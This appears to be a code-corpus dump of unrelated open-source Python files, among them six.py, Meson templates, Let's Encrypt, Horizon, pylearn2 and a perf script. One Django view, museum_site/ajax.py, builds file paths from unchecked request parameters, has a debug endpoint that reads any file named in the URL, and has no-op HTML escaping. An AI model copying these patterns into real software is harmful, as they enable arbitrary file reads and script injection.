setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
| mit |
DrDos0016/z2 | museum_site/ajax.py | 1 | 3215 | from django.http import HttpResponse
from .models import *
from .common import *
import zipfile
import binascii
import base64
import os
def get_zip_file(request):
letter = request.GET.get("letter")
zip = request.GET.get("zip")
filename = request.GET.get("filename", "")
format = request.GET.get("format", "auto")
ext = os.path.splitext(filename.lower())[1]
uploaded = request.GET.get("uploaded", "false")
if filename.find(".") == -1:
ext = ".txt"
if uploaded != "false":
letter = "uploaded"
try:
zip = zipfile.ZipFile(os.path.join(SITE_ROOT, "zgames", letter, zip))
file = zip.open(filename)
except Exception as error:
print(filename)
print(type(error))
print(error)
return HttpResponse(
"An error occurred, and the file could not be retreived."
)
if ext in ("", ".doc", ".txt", ".bat", ".cfg", ".nfo", ".dat", ".bas", ".deu", ".diz", ".c", ".ds_store", ".faq", ".frm", ".fyi", ".gud", ".h", ".hlp", ".lst", ".me", ".nfo", ".pas", ".reg", ".sol", ".zln", ".zml", ".zzl", ".zzm", ".135", ".1st", ".asm", ".bb", ".bin", ".chr", ".sdi", ".now"):
output = file.read()
if format == "auto" or format == "utf-8":
try:
output = output.decode("utf-8")
encoding = "utf-8"
except UnicodeDecodeError as e:
output = output.decode("cp437")
encoding = "cp437"
elif format == "cp437":
output = output.decode("cp437")
encoding = "cp437"
elif format == "hex":
output = "HEXADECIMAL"
encding = "hex"
output = output.replace(
"&", "&"
).replace(
"<", "<"
).replace(
">", ">"
).replace(
" ", " "
).replace(
"\r\n", "<br>"
).replace(
"\r", "<br>"
).replace(
"\n", "<br>"
)
output = "<div class='text-file " + encoding + "'>" + output + "</div>"
return HttpResponse(output)
elif ext in (".hi", ".zzt", ".brd", ".mh", ".sav", ".szt"):
return HttpResponse(binascii.hexlify(file.read()))
elif ext in (".jpg", ".jpeg", ".bmp", ".gif", ".png", ".ico", ".avi"):
b64 = base64.b64encode(file.read())
return HttpResponse(b64)
elif ext in (".wav", ".mp3", ".ogg", ".mid", ".midi"):
response = HttpResponse(file.read())
if ext == ".wav":
response["Content-Type"] = "audio/wav wav"
elif ext == ".mp3":
response["Content-Type"] = "audio/mpeg mp3"
elif ext == ".ogg":
response["Content-Type"] = "audio/ogg ogg"
else: # Fallback
response["Content-Type"] = "application/octet-stream"
return response
else:
return HttpResponse("This file type is not currently supported for embedded content.")
def debug_file(request):
if not os.path.isfile("/var/projects/DEV"):
return HttpResponse("Not on production.")
file = open(request.GET.get("file"), "rb")
return HttpResponse(binascii.hexlify(file.read()))
| mit |
becm/meson | mesonbuild/templates/cpptemplates.py | 1 | 5439 | # Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mesonbuild.templates.sampleimpl import SampleImpl
import re
hello_cpp_template = '''#include <iostream>
#define PROJECT_NAME "{project_name}"
int main(int argc, char **argv) {{
if(argc != 1) {{
std::cout << argv[0] << "takes no arguments.\\n";
return 1;
}}
std::cout << "This is project " << PROJECT_NAME << ".\\n";
return 0;
}}
'''
hello_cpp_meson_template = '''project('{project_name}', 'cpp',
version : '{version}',
default_options : ['warning_level=3',
'cpp_std=c++14'])
exe = executable('{exe_name}', '{source_name}',
install : true)
test('basic', exe)
'''
lib_hpp_template = '''#pragma once
#if defined _WIN32 || defined __CYGWIN__
#ifdef BUILDING_{utoken}
#define {utoken}_PUBLIC __declspec(dllexport)
#else
#define {utoken}_PUBLIC __declspec(dllimport)
#endif
#else
#ifdef BUILDING_{utoken}
#define {utoken}_PUBLIC __attribute__ ((visibility ("default")))
#else
#define {utoken}_PUBLIC
#endif
#endif
namespace {namespace} {{
class {utoken}_PUBLIC {class_name} {{
public:
{class_name}();
int get_number() const;
private:
int number;
}};
}}
'''
lib_cpp_template = '''#include <{header_file}>
namespace {namespace} {{
{class_name}::{class_name}() {{
number = 6;
}}
int {class_name}::get_number() const {{
return number;
}}
}}
'''
lib_cpp_test_template = '''#include <{header_file}>
#include <iostream>
int main(int argc, char **argv) {{
if(argc != 1) {{
std::cout << argv[0] << " takes no arguments.\\n";
return 1;
}}
{namespace}::{class_name} c;
return c.get_number() != 6;
}}
'''
lib_cpp_meson_template = '''project('{project_name}', 'cpp',
version : '{version}',
default_options : ['warning_level=3', 'cpp_std=c++14'])
# These arguments are only used to build the shared library
# not the executables that use the library.
lib_args = ['-DBUILDING_{utoken}']
shlib = shared_library('{lib_name}', '{source_file}',
install : true,
cpp_args : lib_args,
gnu_symbol_visibility : 'hidden',
)
test_exe = executable('{test_exe_name}', '{test_source_file}',
link_with : shlib)
test('{test_name}', test_exe)
# Make this library usable as a Meson subproject.
{ltoken}_dep = declare_dependency(
include_directories: include_directories('.'),
link_with : shlib)
# Make this library usable from the system's
# package manager.
install_headers('{header_file}', subdir : '{header_dir}')
pkg_mod = import('pkgconfig')
pkg_mod.generate(
name : '{project_name}',
filebase : '{ltoken}',
description : 'Meson sample project.',
subdirs : '{header_dir}',
libraries : shlib,
version : '{version}',
)
'''
class CppProject(SampleImpl):
def __init__(self, options):
super().__init__()
self.name = options.name
self.version = options.version
def create_executable(self):
lowercase_token = re.sub(r'[^a-z0-9]', '_', self.name.lower())
source_name = lowercase_token + '.cpp'
open(source_name, 'w').write(hello_cpp_template.format(project_name=self.name))
open('meson.build', 'w').write(hello_cpp_meson_template.format(project_name=self.name,
exe_name=lowercase_token,
source_name=source_name,
version=self.version))
def create_library(self):
lowercase_token = re.sub(r'[^a-z0-9]', '_', self.name.lower())
uppercase_token = lowercase_token.upper()
class_name = uppercase_token[0] + lowercase_token[1:]
test_exe_name = lowercase_token + '_test'
namespace = lowercase_token
lib_hpp_name = lowercase_token + '.hpp'
lib_cpp_name = lowercase_token + '.cpp'
test_cpp_name = lowercase_token + '_test.cpp'
kwargs = {'utoken': uppercase_token,
'ltoken': lowercase_token,
'header_dir': lowercase_token,
'class_name': class_name,
'namespace': namespace,
'header_file': lib_hpp_name,
'source_file': lib_cpp_name,
'test_source_file': test_cpp_name,
'test_exe_name': test_exe_name,
'project_name': self.name,
'lib_name': lowercase_token,
'test_name': lowercase_token,
'version': self.version,
}
open(lib_hpp_name, 'w').write(lib_hpp_template.format(**kwargs))
open(lib_cpp_name, 'w').write(lib_cpp_template.format(**kwargs))
open(test_cpp_name, 'w').write(lib_cpp_test_template.format(**kwargs))
open('meson.build', 'w').write(lib_cpp_meson_template.format(**kwargs))
| apache-2.0 |
kdwink/intellij-community | python/lib/Lib/site-packages/django/contrib/databrowse/plugins/fieldchoices.py | 252 | 3856 | from django import http
from django.db import models
from django.contrib.databrowse.datastructures import EasyModel
from django.contrib.databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.utils.text import capfirst
from django.utils.encoding import smart_str, force_unicode
from django.utils.safestring import mark_safe
import urllib
class FieldChoicePlugin(DatabrowsePlugin):
def __init__(self, field_filter=None):
# If field_filter is given, it should be a callable that takes a
# Django database Field instance and returns True if that field should
# be included. If field_filter is None, that all fields will be used.
self.field_filter = field_filter
def field_dict(self, model):
"""
Helper function that returns a dictionary of all fields in the given
model. If self.field_filter is set, it only includes the fields that
match the filter.
"""
if self.field_filter:
return dict([(f.name, f) for f in model._meta.fields if self.field_filter(f)])
else:
return dict([(f.name, f) for f in model._meta.fields if not f.rel and not f.primary_key and not f.unique and not isinstance(f, (models.AutoField, models.TextField))])
def model_index_html(self, request, model, site):
fields = self.field_dict(model)
if not fields:
return u''
return mark_safe(u'<p class="filter"><strong>View by:</strong> %s</p>' % \
u', '.join(['<a href="fields/%s/">%s</a>' % (f.name, force_unicode(capfirst(f.verbose_name))) for f in fields.values()]))
def urls(self, plugin_name, easy_instance_field):
if easy_instance_field.field in self.field_dict(easy_instance_field.model.model).values():
field_value = smart_str(easy_instance_field.raw_value)
return [mark_safe(u'%s%s/%s/%s/' % (
easy_instance_field.model.url(),
plugin_name, easy_instance_field.field.name,
urllib.quote(field_value, safe='')))]
def model_view(self, request, model_databrowse, url):
self.model, self.site = model_databrowse.model, model_databrowse.site
self.fields = self.field_dict(self.model)
# If the model has no fields with choices, there's no point in going
# further.
if not self.fields:
raise http.Http404('The requested model has no fields.')
if url is None:
return self.homepage_view(request)
url_bits = url.split('/', 1)
if self.fields.has_key(url_bits[0]):
return self.field_view(request, self.fields[url_bits[0]], *url_bits[1:])
raise http.Http404('The requested page does not exist.')
def homepage_view(self, request):
easy_model = EasyModel(self.site, self.model)
field_list = self.fields.values()
field_list.sort(key=lambda k: k.verbose_name)
return render_to_response('databrowse/fieldchoice_homepage.html', {'root_url': self.site.root_url, 'model': easy_model, 'field_list': field_list})
def field_view(self, request, field, value=None):
easy_model = EasyModel(self.site, self.model)
easy_field = easy_model.field(field.name)
if value is not None:
obj_list = easy_model.objects(**{field.name: value})
return render_to_response('databrowse/fieldchoice_detail.html', {'root_url': self.site.root_url, 'model': easy_model, 'field': easy_field, 'value': value, 'object_list': obj_list})
obj_list = [v[field.name] for v in self.model._default_manager.distinct().order_by(field.name).values(field.name)]
return render_to_response('databrowse/fieldchoice_list.html', {'root_url': self.site.root_url, 'model': easy_model, 'field': easy_field, 'object_list': obj_list})
| apache-2.0 |
thanatos/lets-encrypt-preview | letsencrypt/plugins/webroot.py | 1 | 6187 | """Webroot plugin."""
import errno
import logging
import os
from collections import defaultdict
import zope.interface
import six
from acme import challenges
from letsencrypt import errors
from letsencrypt import interfaces
from letsencrypt.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(common.Plugin):
"""Webroot Authenticator."""
description = "Webroot Authenticator"
MORE_INFO = """\
Authenticator plugin that performs http-01 challenge by saving
necessary validation resources to appropriate paths on the file
system. It expects that there is some other HTTP server configured
to serve all files under specified web root ({0})."""
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return self.MORE_INFO.format(self.conf("path"))
@classmethod
def add_parser_arguments(cls, add):
# --webroot-path and --webroot-map are added in cli.py because they
# are parsed in conjunction with --domains
pass
def get_chall_pref(self, domain): # pragma: no cover
# pylint: disable=missing-docstring,no-self-use,unused-argument
return [challenges.HTTP01]
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.full_roots = {}
self.performed = defaultdict(set)
def prepare(self): # pylint: disable=missing-docstring
path_map = self.conf("map")
if not path_map:
raise errors.PluginError(
"Missing parts of webroot configuration; please set either "
"--webroot-path and --domains, or --webroot-map. Run with "
" --help webroot for examples.")
for name, path in path_map.items():
if not os.path.isdir(path):
raise errors.PluginError(path + " does not exist or is not a directory")
self.full_roots[name] = os.path.join(path, challenges.HTTP01.URI_ROOT_PATH)
logger.debug("Creating root challenges validation dir at %s",
self.full_roots[name])
# Change the permissions to be writable (GH #1389)
# Umask is used instead of chmod to ensure the client can also
# run as non-root (GH #1795)
old_umask = os.umask(0o022)
try:
# This is coupled with the "umask" call above because
# os.makedirs's "mode" parameter may not always work:
# https://stackoverflow.com/questions/5231901/permission-problems-when-creating-a-dir-with-os-makedirs-python
os.makedirs(self.full_roots[name], 0o0755)
# Set owner as parent directory if possible
try:
stat_path = os.stat(path)
os.chown(self.full_roots[name], stat_path.st_uid,
stat_path.st_gid)
except OSError as exception:
if exception.errno == errno.EACCES:
logger.debug("Insufficient permissions to change owner and uid - ignoring")
else:
raise errors.PluginError(
"Couldn't create root for {0} http-01 "
"challenge responses: {1}", name, exception)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise errors.PluginError(
"Couldn't create root for {0} http-01 "
"challenge responses: {1}", name, exception)
finally:
os.umask(old_umask)
def perform(self, achalls): # pylint: disable=missing-docstring
assert self.full_roots, "Webroot plugin appears to be missing webroot map"
return [self._perform_single(achall) for achall in achalls]
def _get_root_path(self, achall):
try:
path = self.full_roots[achall.domain]
except KeyError:
raise errors.PluginError("Missing --webroot-path for domain: {0}"
.format(achall.domain))
if not os.path.exists(path):
raise errors.PluginError("Mysteriously missing path {0} for domain: {1}"
.format(path, achall.domain))
return path
def _get_validation_path(self, root_path, achall):
return os.path.join(root_path, achall.chall.encode("token"))
def _perform_single(self, achall):
response, validation = achall.response_and_validation()
root_path = self._get_root_path(achall)
validation_path = self._get_validation_path(root_path, achall)
logger.debug("Attempting to save validation to %s", validation_path)
# Change permissions to be world-readable, owner-writable (GH #1795)
old_umask = os.umask(0o022)
try:
with open(validation_path, "w") as validation_file:
validation_file.write(validation.encode())
finally:
os.umask(old_umask)
self.performed[root_path].add(achall)
return response
def cleanup(self, achalls): # pylint: disable=missing-docstring
for achall in achalls:
root_path = self._get_root_path(achall)
validation_path = self._get_validation_path(root_path, achall)
logger.debug("Removing %s", validation_path)
os.remove(validation_path)
self.performed[root_path].remove(achall)
for root_path, achalls in six.iteritems(self.performed):
if not achalls:
try:
os.rmdir(root_path)
logger.debug("All challenges cleaned up, removing %s",
root_path)
except OSError as exc:
if exc.errno == errno.ENOTEMPTY:
logger.debug("Challenges cleaned up but %s not empty",
root_path)
else:
raise
| apache-2.0 |
laslabs/odoo | addons/account_check_printing/account_journal_dashboard.py | 45 | 1200 | # -*- coding: utf-8 -*-
from openerp import models, api, _
class account_journal(models.Model):
_inherit = "account.journal"
@api.multi
def get_journal_dashboard_datas(self):
domain_checks_to_print = [
('journal_id', '=', self.id),
('payment_method_id.code', '=', 'check_printing'),
('state','=','posted')
]
return dict(
super(account_journal, self).get_journal_dashboard_datas(),
num_checks_to_print=len(self.env['account.payment'].search(domain_checks_to_print))
)
@api.multi
def action_checks_to_print(self):
return {
'name': _('Checks to Print'),
'type': 'ir.actions.act_window',
'view_mode': 'list,form,graph',
'res_model': 'account.payment',
'context': dict(
self.env.context,
search_default_checks_to_send=1,
journal_id=self.id,
default_journal_id=self.id,
default_payment_type='outbound',
default_payment_method_id=self.env.ref('account_check_printing.account_payment_method_check').id,
),
}
| agpl-3.0 |
zouyapeng/horizon | openstack_dashboard/dashboards/admin/volumes/volume_types/forms.py | 7 | 5903 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
class ManageQosSpecAssociation(forms.SelfHandlingForm):
qos_spec_choice = forms.ChoiceField(
label=_("QOS Spec to be associated"),
help_text=_("Choose associated QOS Spec."))
def __init__(self, request, *args, **kwargs):
super(ManageQosSpecAssociation, self).__init__(request,
*args,
**kwargs)
qos_spec_field = self.fields['qos_spec_choice']
qos_spec_field.choices = \
self.populate_qos_spec_choices()
# pre-select the current qos spec, if exists
# if no association exists, the selected entry will be "None"
# since it is index 0 of the choice box
current_qos_spec = self.initial["cur_qos_spec_id"]
if current_qos_spec:
qos_spec_field.initial = current_qos_spec
def populate_qos_spec_choices(self):
# populate qos spec list box
qos_specs = self.initial["qos_specs"]
qos_spec_list = [(qos_spec.id, qos_spec.name)
for qos_spec in qos_specs]
# 'none' is always listed first
qos_spec_list.insert(0, ("-1", _("None")))
return qos_spec_list
def clean_qos_spec_choice(self):
# ensure that new association isn't the same as current association
cleaned_new_spec_id = self.cleaned_data.get('qos_spec_choice')
cur_spec_id = self.initial['cur_qos_spec_id']
found_error = False
if cur_spec_id:
# new = current
if cur_spec_id == cleaned_new_spec_id:
found_error = True
else:
# no current association
if cleaned_new_spec_id == '-1':
# new = current
found_error = True
if found_error:
raise forms.ValidationError(
_('New associated QOS Spec must be different than '
'the current associated QOS Spec.'))
return cleaned_new_spec_id
def handle(self, request, data):
vol_type_id = self.initial['type_id']
new_qos_spec_id = data['qos_spec_choice']
# Update QOS Spec association information
try:
# NOTE - volume types can only be associated with
# ONE QOS Spec at a time
# first we need to un-associate the current QOS Spec, if it exists
cur_qos_spec_id = self.initial['cur_qos_spec_id']
if cur_qos_spec_id:
qos_spec = cinder.qos_spec_get(request,
cur_qos_spec_id)
cinder.qos_spec_disassociate(request,
qos_spec,
vol_type_id)
# now associate with new QOS Spec, if user wants one associated
if new_qos_spec_id != '-1':
qos_spec = cinder.qos_spec_get(request,
new_qos_spec_id)
cinder.qos_spec_associate(request,
qos_spec,
vol_type_id)
messages.success(request,
_('Successfully updated QOS Spec association.'))
return True
except Exception:
exceptions.handle(request,
_('Error updating QOS Spec association.'))
return False
class EditQosSpecConsumer(forms.SelfHandlingForm):
consumer_choice = forms.ChoiceField(
label=_("QOS Spec Consumer"),
choices=cinder.CONSUMER_CHOICES,
help_text=_("Choose consumer for this QOS Spec."))
def __init__(self, request, *args, **kwargs):
super(EditQosSpecConsumer, self).__init__(request, *args, **kwargs)
consumer_field = self.fields['consumer_choice']
qos_spec = self.initial["qos_spec"]
consumer_field.initial = qos_spec.consumer
def clean_consumer_choice(self):
# ensure that new consumer isn't the same as current consumer
qos_spec = self.initial['qos_spec']
cleaned_new_consumer = self.cleaned_data.get('consumer_choice')
old_consumer = qos_spec.consumer
if cleaned_new_consumer == old_consumer:
raise forms.ValidationError(
_('QOS Spec consumer value must be different than '
'the current consumer value.'))
return cleaned_new_consumer
def handle(self, request, data):
qos_spec_id = self.initial['qos_spec_id']
new_consumer = data['consumer_choice']
# Update QOS Spec consumer information
try:
cinder.qos_spec_set_keys(request,
qos_spec_id,
{'consumer': new_consumer})
messages.success(request,
_('Successfully modified QOS Spec consumer.'))
return True
except Exception:
exceptions.handle(request, _('Error editing QOS Spec consumer.'))
return False
| apache-2.0 |
TNick/pylearn2 | pylearn2/models/dbm/__init__.py | 43 | 9023 | """
This module contains functionality related to deep Boltzmann machines.
They are implemented generically in order to make it easy to support
convolution versions, etc.
This code was moved piece by piece incrementally over time from Ian's
private research repository, and it is altogether possible that he
broke something or left out a piece while moving it. If you find any
problems please don't hesitate to contact pylearn-dev and we will fix
the problem and add a unit test.
"""
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import collections
import logging
import numpy as np
import sys
from pylearn2.compat import OrderedDict
from pylearn2.expr.nnet import inverse_sigmoid_numpy
from pylearn2.blocks import Block
from pylearn2.utils import block_gradient
from pylearn2.utils.rng import make_theano_rng
logger = logging.getLogger(__name__)
logger.debug("DBM changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when unrolling inference don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at LISA labo) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
def init_sigmoid_bias_from_marginals(dataset, use_y = False):
"""
Returns b such that sigmoid(b) has the same marginals as the
data. Assumes dataset contains a design matrix. If use_y is
true, sigmoid(b) will have the same marginals as the targets,
rather than the features.
Parameters
----------
dataset : WRITEME
use_y : WRITEME
"""
if use_y:
X = dataset.y
else:
X = dataset.get_design_matrix()
return init_sigmoid_bias_from_array(X)
def init_sigmoid_bias_from_array(arr):
"""
.. todo::
WRITEME
"""
X = arr
if not (X.max() == 1):
raise ValueError("Expected design matrix to consist entirely "
"of 0s and 1s, but maximum value is "+str(X.max()))
if X.min() != 0.:
raise ValueError("Expected design matrix to consist entirely of "
"0s and 1s, but minimum value is "+str(X.min()))
# removed this check so we can initialize the marginals
# with a dataset of bernoulli params
# assert not np.any( (X > 0.) * (X < 1.) )
mean = X.mean(axis=0)
mean = np.clip(mean, 1e-7, 1-1e-7)
init_bias = inverse_sigmoid_numpy(mean)
return init_bias
class DBMSampler(Block):
"""
A Block used to sample from the last layer of a DBM with one hidden layer.
Parameters
----------
dbm : WRITEME
"""
def __init__(self, dbm):
super(DBMSampler, self).__init__()
self.theano_rng = make_theano_rng(None, 2012+10+14, which_method="binomial")
self.dbm = dbm
assert len(self.dbm.hidden_layers) == 1
def __call__(self, inputs):
"""
.. todo::
WRITEME
"""
space = self.dbm.get_input_space()
num_examples = space.batch_size(inputs)
last_layer = self.dbm.get_all_layers()[-1]
layer_to_chains = self.dbm.make_layer_to_symbolic_state(
num_examples, self.theano_rng)
# The examples are used to initialize the visible layer's chains
layer_to_chains[self.dbm.visible_layer] = inputs
layer_to_clamp = OrderedDict([(self.dbm.visible_layer, True)])
layer_to_chains = self.dbm.sampling_procedure.sample(
layer_to_state=layer_to_chains,
theano_rng=self.theano_rng,
layer_to_clamp=layer_to_clamp,
num_steps=1
)
rval = layer_to_chains[last_layer]
rval = last_layer.upward_state(rval)
return rval
def get_input_space(self):
"""
.. todo::
WRITEME
"""
return self.dbm.get_input_space()
def get_output_space(self):
"""
.. todo::
WRITEME
"""
return self.dbm.get_output_space()
def stitch_rbms(batch_size, rbm_list, niter, inference_procedure=None,
targets=False):
"""
Returns a DBM initialized with pre-trained RBMs, with weights and biases
initialized according to R. Salakhutdinov's policy.
This method assumes the RBMs were trained normally. It divides the first
and last hidden layer's weights by two and initialized a hidden layer's
biases as the mean of its biases and the biases of the visible layer of the
RBM above it.
"""
assert len(rbm_list) > 1
# For intermediary hidden layers, there are two set of biases to choose
# from: those from the hidden layer of the given RBM, and those from
# the visible layer of the RBM above it. As in R. Salakhutdinov's code,
# we handle this by computing the mean of those two sets of biases.
for this_rbm, above_rbm in zip(rbm_list[:-1], rbm_list[1:]):
hidden_layer = this_rbm.hidden_layers[0]
visible_layer = above_rbm.visible_layer
new_biases = 0.5 * (hidden_layer.get_biases() +
visible_layer.get_biases())
hidden_layer.set_biases(new_biases)
visible_layer = rbm_list[0].visible_layer
visible_layer.dbm = None
hidden_layers = []
for rbm in rbm_list:
# Make sure all DBM have only one hidden layer, except for the last
# one, which can have an optional target layer
if rbm == rbm_list[-1]:
if targets:
assert len(rbm.hidden_layers) == 2
else:
assert len(rbm.hidden_layers) == 1
else:
assert len(rbm.hidden_layers) == 1
hidden_layers = hidden_layers + rbm.hidden_layers
for hidden_layer in hidden_layers:
hidden_layer.dbm = None
# Divide first and last hidden layer's weights by two, as described
# in R. Salakhutdinov's paper (equivalent to training with RBMs with
# doubled weights)
first_hidden_layer = hidden_layers[-1]
if targets:
last_hidden_layer = hidden_layers[-2]
else:
last_hidden_layer = hidden_layers[-1]
first_hidden_layer.set_weights(0.5 * first_hidden_layer.get_weights())
last_hidden_layer.set_weights(0.5 * last_hidden_layer.get_weights())
return DBM(batch_size, visible_layer, hidden_layers, niter,
inference_procedure)
def flatten(l):
"""
Turns a nested graph of lists/tuples/other objects
into a list of objects.
Parameters
----------
l : WRITEME
Returns
-------
WRITEME
"""
if isinstance(l, (list, tuple, collections.ValuesView)):
rval = []
for elem in l:
if isinstance(elem, (list, tuple)):
rval.extend(flatten(elem))
else:
rval.append(elem)
else:
return [l]
return rval
def block(l):
"""
.. todo::
WRITEME
"""
new = []
for elem in l:
if isinstance(elem, (list, tuple)):
new.append(block(elem))
else:
new.append(block_gradient(elem))
if isinstance(l, tuple):
return tuple(new)
return new
# Make known modules inside this package
# this needs to come after e.g. flatten(), since DBM depends on flatten()
from pylearn2.models.dbm.dbm import DBM
from pylearn2.models.dbm.inference_procedure import BiasInit
from pylearn2.models.dbm.inference_procedure import InferenceProcedure
from pylearn2.models.dbm.inference_procedure import MoreConsistent
from pylearn2.models.dbm.inference_procedure import MoreConsistent2
from pylearn2.models.dbm.inference_procedure import SuperWeightDoubling
from pylearn2.models.dbm.inference_procedure import WeightDoubling
from pylearn2.models.dbm.layer import BinaryVector
from pylearn2.models.dbm.layer import BinaryVectorMaxPool
from pylearn2.models.dbm.layer import BVMP_Gaussian
from pylearn2.models.dbm.layer import CompositeLayer
from pylearn2.models.dbm.layer import ConvMaxPool
from pylearn2.models.dbm.layer import ConvC01B_MaxPool
from pylearn2.models.dbm.layer import GaussianVisLayer
from pylearn2.models.dbm.layer import HiddenLayer
from pylearn2.models.dbm.layer import Layer
from pylearn2.models.dbm.layer import VisibleLayer
from pylearn2.models.dbm.layer import Softmax
from pylearn2.models.dbm.sampling_procedure import SamplingProcedure
| bsd-3-clause |
DragonDevs/android_kernel_zte_msm8226 | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
